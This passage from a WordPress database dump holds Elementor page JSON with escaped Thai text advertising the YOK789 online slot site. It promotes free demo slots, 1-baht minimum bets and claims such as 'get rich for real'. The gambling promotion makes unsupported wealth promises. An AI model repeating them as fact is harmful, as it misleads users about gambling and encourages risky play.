\\u0e08\\u0e38\\u0e14\\u0e02\\u0e32\\u0e22\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e39\\u0e1b\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e40\\u0e23\\u0e35\\u0e22\\u0e1a\\u0e07\\u0e48\\u0e32\\u0e22\\u0e41\\u0e15\\u0e48\\u0e0b\\u0e48\\u0e2d\\u0e19\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e41\\u0e15\\u0e01\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e44\\u0e27\\u0e49\\u0e17\\u0e38\\u0e01\\u0e15\\u0e32 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e2a\\u0e39\\u0e07\\u0e21\\u0e35\\u0e1a\\u0e17\\u0e1a\\u0e32\\u0e17\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e2a\\u0e32\\u0e22\\u0e25\\u0e38\\u0e49\\u0e19\\u0e41\\u0e08\\u0e47\\u0e01\\u0e1e\\u0e2d\\u0e15\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2b\\u0e31\\u0e27\\u0e43\\u0e08\\u0e40\\u0e15\\u0e49\\u0e19\\u0e41\\u0e23\\u0e07\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e27\\u0e07\\u0e25\\u0e49\\u0e2d\\u0e2b\\u0e22\\u0e38\\u0e14 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e2a\\u0e19\\u0e38\\u0e01\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e01\\u0e32\\u0e23\\u0e40\\u0e02\\u0e49\\u0e32\\u0e43\\u0e08\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21 \\u0e40\\u0e1e\\u0e23\\u0e32\\u0e30\\u0e1a\\u0e32\\u0e07\\u0e23\\u0e2d\\u0e1a\\u0e2d\\u0e32\\u0e08\\u0e19\\u0e34\\u0e48\\u0e07\\u0e41\\u0e15\\u0e48\\u0e1e\\u0e2d\\u0e40\\u0e02\\u0e49\\u0e32\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e41\\u0e25\\u0e49\\u0e27\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e22\\u0e32\\u0e27\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e2a\\u0e30\\u0e43\\u0e08 \\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e04\\u0e19\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e2d\\u0e1a\\u0e04\\u0e27\\u0e32\\u0e21\\u0e15\\u0e37\\u0e48\\u0e19\\u0e40\\u0e15\\u0e49\\u0e19\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e23\\u0e27\\u0e14\\u0e40\\u0e23\\u0e47\\u0e27\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19 \\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e04\\u0e21\\u0e0a\\u0e31\\u0e14 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e0a\\u0e48\\u0e27\\u0e22\\u0e40\\u0e1e\\u0e34\\u0e48\\u0e21\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e23\\u0e48\\u0e27\\u0e21\\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e0a\\u0e19\\u0e30 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e32\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e23\\u0e2d\\u0e1a\\u0e21\\u0e35\\u0e40\\u0e2a\\u0e19\\u0e48\\u0e2b\\u0e4c\\u0e40\\u0e09\\u0e1e\\u0e32\\u0e30\\u0e15\\u0e31\\u0e27\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e23\\u0e49\\u0e32\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e23\\u0e39\\u0e49\\u0e2a\\u0e36\\u0e01\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e01\\u0e14\\u0e15\\u0e48\\u0e2d\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e1d\\u0e37\\u0e19\\u0e43\\u0e08<\\/span><\\/p><h3><span style=\\\"color: #99cc00;\\\"><b>\\u0e40\\u0e01\\u0e21\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 Dragon Hatc<\\/b><\\/span><\\/h3><p><span style=\\\"font-weight: 400;\\\">Dragon Hatch \\u0e04\\u0e37\\u0e2d\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e2a\\u0e32\\u0e22\\u0e41\\u0e1f\\u0e19\\u0e15\\u0e32\\u0e0b\\u0e35\\u0e17\\u0e35\\u0e48\\u0e2b\\u0e22\\u0e34\\u0e1a\\u0e40\\u0e23\\u0e37\\u0e48\\u0e2d\\u0e07\\u0e23\\u0e32\\u0e27\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e21\\u0e32\\u0e40\\u0e15\\u0e34\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e08\\u0e31\\u0e14\\u0e40\\u0e15\\u0e47\\u0e21 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e04\\u0e37\\u0e2d\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e08\\u0e48\\u0e32\\u0e22\\u0e23\\u0e32\\u0e07\\u0e27\\u0e31\\u0e25\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e25\\u0e38\\u0e49\\u0e19\\u0e23\\u0e31\\u0e27\\u0e43\\u0e19\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e1f\\u0e23\\u0e35\\u0e2a\\u0e1b\\u0e34\\u0e19 \\u0e2a\\u0e31\\u0e0d\\u0e25\\u0e31\\u0e01\\u0e29\\u0e13\\u0e4c\\u0e44\\u0e02\\u0e48\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23\\u0e41\\u0e15\\u0e48\\u0e25\\u0e30\\u0e43\\u0e1a\\u0e21\\u0e35\\u0e21\\u0e39\\u0e25\\u0e04\\u0e48\\u0e32\\u0e41\\u0e15\\u0e01\\u0e15\\u0e48\\u0e32\\u0e07\\u0e01\\u0e31\\u0e19 \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e01\\u0e32\\u0e23\\u0e2b\\u0e21\\u0e38\\u0e19\\u0e40\\u0e15\\u0e47\\u0e21\\u0e44\\u0e1b\\u0e14\\u0e49\\u0e27\\u0e22\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e32\\u0e14\\u0e2b\\u0e27\\u0e31\\u0e07 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e40\\u0e17\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e40\\u0e01\\u0e21\\u0e19\\u0e35\\u0e49\\u0e04\\u0e37\\u0e2d\\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e44\\u0e1f\\u0e41\\u0e25\\u0e30\\u0e40\\u0e2a\\u0e35\\u0e22\\u0e07\\u0e04\\u0e33\\u0e23\\u0e32\\u0e21\\u0e17\\u0e35\\u0e48\\u0e1b\\u0e25\\u0e38\\u0e01\\u0e2d\\u0e32\\u0e23\\u0e21\\u0e13\\u0e4c\\u0e19\\u0e31\\u0e01\\u0e25\\u0e48\\u0e32\\u0e43\\u0e2b\\u0e49\\u0e15\\u0e37\\u0e48\\u0e19\\u0e15\\u0e31\\u0e27\\u0e15\\u0e25\\u0e2d\\u0e14\\u0e40\\u0e27\\u0e25\\u0e32 \\u0e43\\u0e04\\u0e23\\u0e0a\\u0e2d\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e21\\u0e35\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e1e\\u0e35\\u0e04\\u0e0a\\u0e31\\u0e14\\u0e40\\u0e08\\u0e19\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e1e\\u0e25\\u0e34\\u0e01\\u0e40\\u0e01\\u0e21\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27\\u0e08\\u0e30\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e41\\u0e19\\u0e48\\u0e19\\u0e2d\\u0e19 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e07\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e0b\\u0e31\\u0e1a\\u0e0b\\u0e49\\u0e2d\\u0e19\\u0e41\\u0e15\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e1f\\u0e35\\u0e25\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1c\\u0e08\\u0e0d\\u0e20\\u0e31\\u0e22\\u0e43\\u0e19\\u0e14\\u0e34\\u0e19\\u0e41\\u0e14\\u0e19\\u0e21\\u0e31\\u0e07\\u0e01\\u0e23 \\u0e17\\u0e38\\u0e01\\u0e04\\u0e23\\u0e31\\u0e49\\u0e07\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e1e\\u0e34\\u0e40\\u0e28\\u0e29\\u0e04\\u0e37\\u0e2d\\u0e0a\\u0e48\\u0e27\\u0e07\\u0e40\\u0e27\\u0e25\\u0e32\\u0e17\\u0e35\\u0e48\\u0e25\\u0e38\\u0e49\\u0e19\\u0e2b\\u0e19\\u0e31\\u0e01\\u0e41\\u0e25\\u0e30\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e40\\u0e2b\\u0e47\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e34\\u0e19\\u0e04\\u0e32\\u0e14 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e2d\\u0e35\\u0e01\\u0e40\\u0e01\\u0e21\\u0e17\\u0e35\\u0e48\\u0e15\\u0e2d\\u0e1a\\u0e42\\u0e08\\u0e17\\u0e22\\u0e4c\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e22\\u0e38\\u0e04\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e44\\u0e14\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e19\\u0e41\\u0e25\\u0e30\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e17\\u0e33\\u0e01\\u0e33\\u0e44\\u0e23\\u0e43\\u0e19\\u0e23\\u0e2d\\u0e1a\\u0e40\\u0e14\\u0e35\\u0e22\\u0e27<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"c0fa625\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Character-2-.webp\",\"id\":288,\"size\":\"\",\"alt\":\"yok789\",\"source\":\"library\"},\"image_size\":\"full\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"49411b8\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e1f\\u0e23\\u0e35 YOK789 \\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e04\\u0e48\\u0e32\\u0e22\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14 \",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"035032d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><span style=\\\"font-weight: 400;\\\">\\u0e2a\\u0e32\\u0e22\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e25\\u0e2d\\u0e07\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e38\\u0e22\\u0e08\\u0e23\\u0e34\\u0e07\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e16\\u0e39\\u0e01\\u0e43\\u0e08\\u0e42\\u0e2b\\u0e21\\u0e14 <strong>\\u0e1b\\u0e31\\u0e48\\u0e19 \\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15 \\u0e1f\\u0e23\\u0e35 \\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07<\\/strong><\\/span><span style=\\\"font-weight: 400;\\\">\\u00a0\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1b\\u0e34\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e14\\u0e25\\u0e2d\\u0e07\\u0e40\\u0e25\\u0e48\\u0e19\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e08\\u0e33\\u0e01\\u0e31\\u0e14\\u0e04\\u0e48\\u0e32\\u0e22 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e15\\u0e34\\u0e21\\u0e01\\u0e47\\u0e40\\u0e02\\u0e49\\u0e32\\u0e44\\u0e1b\\u0e2a\\u0e31\\u0e21\\u0e1c\\u0e31\\u0e2a\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e04\\u0e23\\u0e1a\\u0e17\\u0e38\\u0e01\\u0e1f\\u0e35\\u0e40\\u0e08\\u0e2d\\u0e23\\u0e4c \\u0e08\\u0e30\\u0e25\\u0e2d\\u0e07\\u0e08\\u0e31\\u0e1a\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e41\\u0e15\\u0e01 \\u0e14\\u0e39\\u0e23\\u0e2d\\u0e1a\\u0e42\\u0e1a\\u0e19\\u0e31\\u0e2a\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e40\\u0e17\\u0e2a\\u0e2a\\u0e44\\u0e15\\u0e25\\u0e4c\\u0e40\\u0e01\\u0e21\\u0e44\\u0e2b\\u0e19\\u0e40\\u0e2b\\u0e21\\u0e32\\u0e30\\u0e01\\u0e31\\u0e1a\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e01\\u0e47\\u0e17\\u0e33\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e17\\u0e35\\u0e48 \\u0e04\\u0e27\\u0e32\\u0e21\\u0e14\\u0e35\\u0e07\\u0e32\\u0e21\\u0e04\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e49\\u0e1b\\u0e23\\u0e30\\u0e2a\\u0e1a\\u0e01\\u0e32\\u0e23\\u0e13\\u0e4c\\u0e40\\u0e2b\\u0e21\\u0e37\\u0e2d\\u0e19\\u0e40\\u0e25\\u0e48\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e20\\u0e32\\u0e1e\\u0e25\\u0e37\\u0e48\\u0e19 \\u0e40\\u0e2d\\u0e1f\\u0e40\\u0e1f\\u0e01\\u0e15\\u0e4c\\u0e04\\u0e23\\u0e1a \\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e27\\u0e32\\u0e07\\u0e41\\u0e1c\\u0e19\\u0e01\\u0e48\\u0e2d\\u0e19\\u0e25\\u0e07\\u0e2a\\u0e19\\u0e32\\u0e21\\u0e08\\u0e23\\u0e34\\u0e07\\u0e44\\u0e14\\u0e49\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e37\\u0e2d\\u0e42\\u0e1b\\u0e23 \\u0e43\\u0e04\\u0e23\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e1d\\u0e36\\u0e01\\u0e2d\\u0e48\\u0e32\\u0e19\\u0e40\\u0e01\\u0e21\\u0e2b\\u0e23\\u0e37\\u0e2d\\u0e2b\\u0e32\\u0e2a\\u0e39\\u0e15\\u0e23\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e40\\u0e02\\u0e49\\u0e32\\u0e21\\u0e37\\u0e2d\\u0e2a\\u0e32\\u0e21\\u0e32\\u0e23\\u0e16\\u0e43\\u0e0a\\u0e49\\u0e42\\u0e2b\\u0e21\\u0e14\\u0e19\\u0e35\\u0e49\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e40\\u0e21\\u0e37\\u0e48\\u0e2d\\u0e1e\\u0e23\\u0e49\\u0e2d\\u0e21\\u0e04\\u0e48\\u0e2d\\u0e22\\u0e2a\\u0e25\\u0e31\\u0e1a\\u0e21\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07\\u0e01\\u0e47\\u0e40\\u0e14\\u0e34\\u0e19\\u0e40\\u0e01\\u0e21\\u0e44\\u0e14\\u0e49\\u0e40\\u0e09\\u0e35\\u0e22\\u0e1a\\u0e01\\u0e27\\u0e48\\u0e32\\u0e40\\u0e14\\u0e34\\u0e21 \\u0e40\\u0e1b\\u0e47\\u0e19\\u0e1e\\u0e37\\u0e49\\u0e19\\u0e17\\u0e35\\u0e48\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e31\\u0e49\\u0e07\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e41\\u0e25\\u0e30\\u0e2a\\u0e32\\u0e22\\u0e40\\u0e01\\u0e4b\\u0e32\\u0e44\\u0e14\\u0e49\\u0e1e\\u0e31\\u0e12\\u0e19\\u0e32\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e15\\u0e31\\u0e27\\u0e40\\u0e2d\\u0e07\\u0e42\\u0e14\\u0e22\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e40\\u0e2a\\u0e35\\u0e48\\u0e22\\u0e07\\u0e17\\u0e38\\u0e19\\u0e15\\u0e31\\u0e49\\u0e07\\u0e41\\u0e15\\u0e48\\u0e23\\u0e2d\\u0e1a\\u0e41\\u0e23\\u0e01 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e2a\\u0e39\\u0e48\\u0e42\\u0e2d\\u0e01\\u0e32\\u0e2a\\u0e23\\u0e27\\u0e22\\u0e14\\u0e49\\u0e27\\u0e22\\u0e01\\u0e32\\u0e23\\u0e40\\u0e23\\u0e34\\u0e48\\u0e21\\u0e08\\u0e32\\u0e01\\u0e28\\u0e39\\u0e19\\u0e22\\u0e4c\\u0e41\\u0e1a\\u0e1a\\u0e21\\u0e35\\u0e0a\\u0e31\\u0e49\\u0e19\\u0e40\\u0e0a\\u0e34\\u0e07<\\/span><\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(2706,374,'_thumbnail_id','371'),(2707,374,'_elementor_edit_mode','builder'),(2708,374,'_elementor_template_type','wp-page'),(2709,374,'_elementor_version','3.35.5'),(2710,374,'_elementor_pro_version','3.32.3'),(2711,374,'_wp_page_template','default'),(2712,374,'_elementor_page_settings','a:1:{s:10:\"hide_title\";s:3:\"yes\";}'),(2713,374,'_elementor_data','[{\"id\":\"e34294a\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"margin\":{\"unit\":\"px\",\"top\":\"10\",\"right\":0,\"bottom\":\"10\",\"left\":0,\"isLinked\":true}},\"elements\":[{\"id\":\"71011f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"e6e2e32\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/True-wallet-Yok789.webp\",\"id\":274,\"size\":\"\",\"alt\":\"YOK789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":-5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"ac7884b\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"f319719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/amb18b.com\\/wp-content\\/uploads\\/2026\\/02\\/Slot-NO1-Yok789.webp\",\"id\":278,\"size\":\"\",\"alt\":\"Yok789\",\"source\":\"library\"},\"image_size\":\"full\",\"width\":{\"unit\":\"%\",\"size\":100,\"sizes\":[]},\"image_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":5,\"blur\":10,\"spread\":5,\"color\":\"rgba(241.14765625, 7.867606108292297, 7.867606108292297, 0.5)\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6356635\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"8cd2aba\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"62ee80e\",\"elType\":\"widget\",\"settings\":{\"title\":\"YOK789 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07 \\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22 \\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e23\\u0e27\\u0e22\\u0e44\\u0e14\\u0e49\\u0e08\\u0e23\\u0e34\\u0e07\",\"header_size\":\"h1\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"474d65d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><a href=\\\"https:\\/\\/amb18b.com\\/\\\"><b>YOK789<\\/b><\\/a><span style=\\\"font-weight: 400;\\\"> \\u0e04\\u0e37\\u0e2d\\u0e08\\u0e31\\u0e07\\u0e2b\\u0e27\\u0e30\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e02\\u0e2d\\u0e07\\u0e2a\\u0e32\\u0e22\\u0e1b\\u0e31\\u0e48\\u0e19\\u0e17\\u0e35\\u0e48\\u0e2d\\u0e22\\u0e32\\u0e01\\u0e40\\u0e1b\\u0e25\\u0e35\\u0e48\\u0e22\\u0e19\\u0e40\\u0e27\\u0e25\\u0e32\\u0e27\\u0e48\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e01\\u0e25\\u0e32\\u0e22\\u0e40\\u0e1b\\u0e47\\u0e19\\u0e40\\u0e07\\u0e34\\u0e19\\u0e41\\u0e1a\\u0e1a\\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e04\\u0e34\\u0e14\\u0e40\\u0e22\\u0e2d\\u0e30 \\u0e40\\u0e27\\u0e47\\u0e1a\\u0e2a\\u0e25\\u0e47\\u0e2d\\u0e15\\u0e21\\u0e32\\u0e41\\u0e23\\u0e07\\u0e17\\u0e35\\u0e48\\u0e01\\u0e23\\u0e30\\u0e41\\u0e2a\\u0e01\\u0e33\\u0e25\\u0e31\\u0e07\\u0e1e\\u0e38\\u0e48\\u0e07\\u0e41\\u0e1a\\u0e1a\\u0e2b\\u0e22\\u0e38\\u0e14\\u0e44\\u0e21\\u0e48\\u0e2d\\u0e22\\u0e39\\u0e48 \\u0e08\\u0e38\\u0e14\\u0e40\\u0e14\\u0e48\\u0e19\\u0e2d\\u0e22\\u0e39\\u0e48\\u0e17\\u0e35\\u0e48\\u0e40\\u0e1a\\u0e17\\u0e02\\u0e31\\u0e49\\u0e19\\u0e15\\u0e48\\u0e33 1 \\u0e1a\\u0e32\\u0e17 \\u0e40\\u0e1b\\u0e34\\u0e14\\u0e17\\u0e32\\u0e07\\u0e43\\u0e2b\\u0e49\\u0e21\\u0e37\\u0e2d\\u0e43\\u0e2b\\u0e21\\u0e48\\u0e25\\u0e2d\\u0e07\\u0e02\\u0e2d\\u0e07\\u0e44\\u0e14\\u0e49\\u0e2a\\u0e1a\\u0e32\\u0e22 \\u0e2a\\u0e48\\u0e27\\u0e19\\u0e2a\\u0e32\\u0e22\\u0e42\\u0e1b\\u0e23\\u0e01\\u0e47\\u0e44\\u0e25\\u0e48\\u0e25\\u0e48\\u0e32\\u0e01\\u0e33\\u0e44\\u0e23\\u0e44\\u0e14\\u0e49\\u0e40\\u0e15\\u0e47\\u0e21\\u0e2a\\u0e1b\\u0e35\\u0e14 \\u0e40\\u0e01\\u0e21\\u0e41\\u0e15\\u0e01\\u0e07\\u0e48\\u0e32\\u0e22\\u0e20\\u0e32\\u0e1e\\u0e2a\\u0e27\\u0e22\\u0e25\\u0e37\\u0e48\\u0e19\\u0e44\\u0e2b\\u0e25\\u0e23\\u0e30\\u0e1a\\u0e1a\\u0e40\\u0e2a\\u0e16\\u0e35\\u0e22\\u0e23\\u0e44\\u0e21\\u0e48\\u0e2a\\u0e30\\u0e14\\u0e38\\u0e14 \\u0e40\\u0e15\\u0e34\\u0e21\\u0e16\\u0e2d\\u0e19\\u0e40\\u0e23\\u0e47\\u0e27\\u0e17\\u0e31\\u0e19\\u0e43\\u0e08\\u0e17\\u0e33\\u0e43\\u0e2b\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e34\\u0e19\\u0e32\\u0e17\\u0e35\\u0e21\\u0e35\\u0e04\\u0e48\\u0e32 \\u0e1a\\u0e23\\u0e23\\u0e22\\u0e32\\u0e01\\u0e32\\u0e28\\u0e43\\u0e19\\u0e40\\u0e27\\u0e47\\u0e1a\\u0e04\\u0e37\\u0e2d\\u0e04\\u0e27\\u0e32\\u0e21\\u0e04\\u0e36\\u0e01\\u0e04\\u0e31\\u0e01\\u0e1c\\u0e2a\\u0e21\\u0e04\\u0e27\\u0e32\\u0e21\\u0e21\\u0e31\\u0e48\\u0e19\\u0e43\\u0e08\\u0e27\\u0e48\\u0e32\\u0e40\\u0e25\\u0e48\\u0e19\\u0e41\\u0e25\\u0e49\\u0e27\\u0e21\\u0e35\\u0e25\\u0e38\\u0e49\\u0e19\\u0e08\\u0e23\\u0e34\\u0e07 \\u0e44\\u0e21\\u0e48\\u0e15\\u0e49\\u0e2d\\u0e07\\u0e17\\u0e38\\u0e19\\u0e2b\\u0e19\\u0e32\\u0e01\\u0e47\\u0e21\\u0e35\\u0e2a\\u0e34\\u0e17\\u0e18\\u0e34\\u0e4c\\u0e1b\\u0e31\\u0e49\\u0e19\\u0e22\\u0e2d\\u0e14\\u0e43\\u0e2b\\u0e49\\u0e42\\u0e15\\u0e44\\u0e14\\u0e49\\u0e17\\u0e38\\u0e01\\u0e27\\u0e31\\u0e19 